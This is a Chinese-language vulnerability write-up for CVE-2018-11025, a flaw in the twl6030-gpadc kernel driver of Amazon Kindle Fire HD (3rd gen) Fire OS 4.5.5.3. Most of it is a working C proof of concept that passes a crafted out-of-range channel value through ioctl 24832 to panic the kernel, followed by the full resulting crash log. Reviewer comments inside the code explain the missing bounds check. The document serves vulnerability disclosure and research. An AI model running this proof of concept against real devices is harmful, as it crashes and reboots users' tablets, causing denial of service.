(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞
一、漏洞简介
Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 /omap/drivers/mfd/twl6030-gpadc.c 允许攻击者通过向设备文件 /dev/twl6030-gpadc 的 ioctl 命令 **24832** 传入特制参数，导致内核崩溃。
要触发此漏洞，必须打开设备文件 /dev/twl6030-gpadc，并以命令 **24832** 和精心构造的数据作为第三个参数，在该设备文件上调用 ioctl 系统调用。
二、漏洞影响
Fire OS 4.5.5.3
三、复现过程
poc
/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes
 * the system crash via IOCTL 24832.
 *
 * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
 *
 * Reviewer notes on this listing (code left exactly as published):
 *  - The program issues a single ioctl() on the device and expects the kernel
 *    to panic (see the "System will crash and reboot." message below).  The
 *    crash log in the write-up reports the fault inside twl6030_gpadc_ioctl
 *    ("Unable to handle kernel paging request"), i.e. a kernel-side bounds /
 *    validation failure on caller-supplied data.  The fix direction is a
 *    range check on the user-supplied channel before the driver uses it.
 *  - close() and system() are called without <unistd.h> / <stdlib.h>, and
 *    `command` is declared without a type, so the listing relies on implicit
 *    int and implicit function declarations (pre-C99 behaviour; warnings or
 *    hard errors on current compilers).
 *  - The two system("echo N > ...") calls presumably leave a breadcrumb file
 *    so the failing step can be read back after the reboot; the author does
 *    not say so explicitly.
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

/* Character device exposed by the twl6030-gpadc driver. */
const static char *driver = "/dev/twl6030-gpadc";
/* ioctl request number.  24832 == 0x6100, which is the value the crash log
 * shows in r5 at the time of the fault.  Declared with implicit int. */
static command = 24832;

/* Third ioctl argument as laid out by the PoC.  The kernel-side definition is
 * not on the page; assumed to mirror the driver's user-parms struct. */
struct twl6030_gpadc_user_parms {
    int channel;           /* ADC channel index requested by the caller */
    int status;            /* presumably written back by the driver; zeroed here */
    unsigned short result; /* presumably written back by the driver; zeroed here */
};

/*
 * Entry point.  Opens the device, passes the crafted parms to ioctl() and
 * returns -1 if open() or ioctl() fails, 0 if the ioctl returns normally
 * (which the author does not expect).  argc, argv and env are unused.
 */
int main(int argc, char **argv, char **env)
{
    struct twl6030_gpadc_user_parms payload;
    /* Out-of-range channel value.  The same word (9b2a9212) is visible in the
     * crash log's stack dump, and the fault address is inside
     * twl6030_gpadc_ioctl — consistent with the driver indexing on this value
     * without a bounds check (inferred from the log; driver source not shown). */
    payload.channel = 0x9b2a9212;
    payload.status = 0x0;
    payload.result = 0x0;
    int fd = 0; /* NOTE(review): initializer is immediately overwritten */
    fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log"); /* step marker: open failed */
        return -1;
    }
    /* NOTE(review): the message says "payload NULL" but &payload is passed below. */
    printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
    printf("System will crash and reboot.\n");
    /* NOTE(review): the error text is misleading — a negative return here only
     * means the ioctl was rejected (errno tells why), not that an allocation
     * failed. */
    if(ioctl(fd, command, &payload) < 0) {
        printf("Allocation of structs failed, %d\n", errno);
        system("echo 2 > /data/local/tmp/log"); /* step marker: ioctl rejected */
        return -1;
    }
    close(fd);
    return 0;
}
崩溃日志
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc [18460.330139] pgd = ca210000 [18460.333251] [4b3f25fc] *pgd=00000000 [18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM [18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O) [18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1) [18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180 [18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484 [18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013 [18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04 [18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec [18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec [18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001 [18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user [18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015 [18460.418609] [18460.418609] PC: 0xc031b000: [18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008 [18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0 [18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f [18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102 [18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc [18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800 [18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004 [18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004 [18460.508544] [18460.508544] LR: 0xc031a8d0: [18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878 [18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454 [18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 
e1d910b6 e3510001 9a00000a [18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69 [18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000 [18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025 [18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc [18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6 [18460.598571] [18460.598571] SP: 0xde94dd10: [18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff [18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8 [18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608 [18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff [18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000 [18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8 [18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001 [18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818 [18460.688629] [18460.688659] FP: 0xde94de84: [18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 [18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 [18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 [18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 [18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 [18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 [18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 [18460.768096] df64 00000000 de94dfa4 
de94df78 c01365e0 c0135fc4 00000000 00000000 00000400 [18460.778625] [18460.778625] R1: 0xde94de68: [18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90 [18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff [18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001 [18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000 [18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c [18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c [18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 [18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 [18460.868713] [18460.868713] R3: 0xfffffe34: [18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ******** [18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ******** [18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ******** [18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ******** [18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ******** [18460.958709] [18460.958709] R7: 0xde94bf80: [18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000 [18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000 [18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c [18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 
c004cd64 c0068a70 1d04e2fb 1dfbe204 [18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80 [18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8 [18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000 [18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000 [18461.048828] [18461.048828] R9: 0xdcccf588: [18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58 [18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000 [18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000 [18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000 [18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800 [18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25 [18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000 [18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684 [18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8) [18461.146697] Stack: (0xde94dd90 to 0xde94e000) [18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000 [18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8 [18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001 [18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000 [18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800 [18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360 [18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002 [18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 
00000028 000fffff 00000001 [18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 [18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 [18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 [18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 [18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 [18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 [18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 [18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 [18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8 [18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec [18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604 [18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000 [18461.335296] Backtrace: [18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4) [18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000 [18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84) [18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30) [18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618 [18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) [18461.401061] Board Information: [18461.401061] Revision : 0001 [18461.401092] Serial : 0000000000000000 [18461.401092] SoC Information: [18461.401092] CPU : OMAP4470 [18461.401122] Rev : ES1.0 [18461.401122] Type : HS [18461.401122] Production ID: 0002B975-000000CC [18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004 
[18461.401153] [18461.406127] audit_printk_skb: 111 callbacks suppressed [18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.534057] ---[ end trace f98f4a7b98572f61 ]--- [18461.540374] Kernel panic - not syncing: Fatal exception [18461.546173] CPU1: stopping [18461.549285] Backtrace: [18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c) [18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950 [18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4) [18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60) [18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60) [18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8) [18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0 [18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0 [18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff [18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed [18461.635559] CPU0 PC (0) : 0xc003ee38 
[18461.639617] CPU0 PC (1) : 0xc003ee54 [18461.643798] CPU0 PC (2) : 0xc003ee54 [18461.647857] CPU0 PC (3) : 0xc003ee54 [18461.651916] CPU0 PC (4) : 0xc003ee54 [18461.656097] CPU0 PC (5) : 0xc003ee54 [18461.660156] CPU0 PC (6) : 0xc003ee54 [18461.664215] CPU0 PC (7) : 0xc003ee54 [18461.668395] CPU0 PC (8) : 0xc003ee54 [18461.672454] CPU0 PC (9) : 0xc003ee54 [18461.676513] CPU1 PC (0) : 0xc0019b2c [18461.680694] CPU1 PC (1) : 0xc0019b2c [18461.684753] CPU1 PC (2) : 0xc0019b2c [18461.688812] CPU1 PC (3) : 0xc0019b2c [18461.692871] CPU1 PC (4) : 0xc0019b2c [18461.697051] CPU1 PC (5) : 0xc0019b2c [18461.701110] CPU1 PC (6) : 0xc0019b2c [18461.705169] CPU1 PC (7) : 0xc0019b2c [18461.709381] CPU1 PC (8) : 0xc0019b2c [18461.713409] CPU1 PC (9) : 0xc0019b2c [18461.717498] [18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017 [18461.719299]